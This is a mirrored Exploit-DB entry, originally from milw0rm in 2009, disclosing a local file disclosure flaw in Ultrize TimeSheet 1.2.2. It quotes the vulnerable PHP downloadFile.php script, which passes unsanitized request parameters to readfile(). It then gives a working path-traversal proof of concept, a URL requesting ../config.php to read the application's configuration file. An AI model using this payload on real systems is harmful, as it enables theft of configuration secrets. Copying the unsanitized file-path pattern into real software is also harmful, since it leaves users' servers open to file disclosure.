bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/9307.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

49 lines
No EOL
1.7 KiB
Text
Raw Blame History

Ultrize TimeSheet 1.2.2 readfile() Local File Disclosure Vulnerability
Code page /actions/downloadFile.php
====
<?php
//** This script performs the actual file download
$fileName = $_REQUEST['fileName']; <--!!
$job_id = $_REQUEST['job_id']; <--!!
$fullFile = $config['upload_dir'].$job_id.'/'.$fileName; <--!!
if (file_exists($fullFile))
{
header("Content-Type: application/octet-stream");
header("Content-Length: ".filesize($fullFile));
header('Content-Disposition: attachment; fileName="'.$fileName.'"');
readfile($fullFile); <--!!
}
else
{
header("HTTP/1.0 404 Not Found");
print "<h1>File not found. </h1>";
print $fileName;
print "<hr>Please make sure your file paths are correct: {$config['upload_dir']}/{$job_id}/$fileName}<br />";
}
?>
====
Poc
/actions/downloadFile.php?fileName=../config.php
.___________..______ ____ ____ ___ _______
| || _ \ \ \ / / / \ / _____|
`---| |----`| |_) | \ \/ / / ^ \ | | __
| | | / \_ _/ / /_\ \ | | |_ |
| | | |\ \----. | | / _____ \ | |__| |
|__| | _| `._____| |__| /__/ \__\ \______|
___ ______ ___ _______ _______ .___ ___. ____ ____
/ \ / | / \ | \ | ____|| \/ | \ \ / /
/ ^ \ | ,----' / ^ \ | .--. || |__ | \ / | \ \/ /
/ /_\ \ | | / /_\ \ | | | || __| | |\/| | \_ _/
/ _____ \ | `----./ _____ \ | '--' || |____ | | | | | |
/__/ \__\ \______/__/ \__\ |_______/ |_______||__| |__| |__|
# milw0rm.com [2009-07-30]
Reference in a new issue View git blame Copy permalink